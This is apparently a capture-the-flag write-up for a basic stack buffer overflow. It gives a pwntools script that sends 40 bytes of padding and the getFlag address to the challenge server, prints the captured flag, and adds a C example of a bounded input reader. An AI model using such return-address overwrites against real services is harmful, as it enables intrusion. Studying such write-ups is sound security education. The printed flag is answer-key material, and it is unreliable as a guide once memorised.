Classic Bufferoverflow

Solution
I think this is the trickiest challenge I have ever faced.
When I run the program, it will show something like the ltrace or strace command.

First of all, when facing a buffer overflow challenge, find the offset, which for this challenge is 40 bytes.

"Better luck next time!" not being printed in the image below means that we hit the offset value.

Next, I went through the code using gdb-gef and I found 3 functions: main, getFlag and getInput.

The target is the function getFlag, obviously to give me the flag. So, I got the address of the function, which is 0x00000000004011d6, and used the same technique as in the challenge Don't Overboard 2.

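So, I made a simple script to ease my life:

from pwn import *

context.bits = 64                    # 64-bit target, so p64() packs an 8-byte address
conn = ELF('./challenge.bin')        # load the local copy of the challenge binary
rem = remote('3.26.44.175', 3336)    # connect to the challenge service

offset = 40                          # bytes of padding before the saved return address
addr = 0x004011d6                    # address of getFlag found with gdb-gef

payload = b"a" * offset              # padding up to the return address
payload += p64(addr)                 # overwrite the return address with getFlag
rem.sendline(payload)
rem.interactive()
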
Just run it and the flag is already served.

Flag
CURTIN_CTF{B4S1C_0V3RF10W}
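
The root cause of this class of bug is an input routine that writes past its stack buffer. The following is an added example, not the challenge's source (which is not shown on this page): a bounded line reader that rejects over-long input instead of overwriting the frame. BUF_SIZE, read_line_bounded and feed are assumed names, and the 32-byte buffer is an assumption chosen to be consistent with the 40-byte offset.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 32 /* assumed size; the challenge source is not on the page */

/* Assumed vulnerable pattern: char buf[BUF_SIZE]; gets(buf);  (no length limit) */
enum { LINE_OK = 0, LINE_EOF = -1, LINE_TOO_LONG = -2 };

/* Read one line into buf without ever writing past buf[size - 1].
 * Over-long lines are rejected and drained so a later read cannot pick them up. */
int read_line_bounded(FILE *in, char *buf, size_t size)
{
    if (size == 0 || fgets(buf, (int)size, in) == NULL)
        return LINE_EOF;
    size_t len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[len - 1] = '\0';            /* whole line fitted */
        return LINE_OK;
    }
    int c = fgetc(in);
    if (c == '\n' || c == EOF)
        return LINE_OK;                 /* line filled the buffer exactly, or input ended */
    while ((c = fgetc(in)) != '\n' && c != EOF)
        ;                               /* discard the rest of the over-long line */
    buf[0] = '\0';
    return LINE_TOO_LONG;
}

/* Demo helper: run constructed input through the reader via a temp file. */
int feed(const char *data, char *out, size_t size)
{
    FILE *f = tmpfile();
    if (f == NULL) return LINE_EOF;
    fputs(data, f);
    rewind(f);
    int rc = read_line_bounded(f, out, size);
    fclose(f);
    return rc;
}

int main(void)
{
    char buf[BUF_SIZE], big[50];
    memset(big, 'a', 48);               /* constructed 48-byte line, as long as the script's payload */
    big[48] = '\n'; big[49] = '\0';
    printf("short: %d, long: %d\n", feed("hello\n", buf, sizeof buf), feed(big, buf, sizeof buf));
    return 0;
}
```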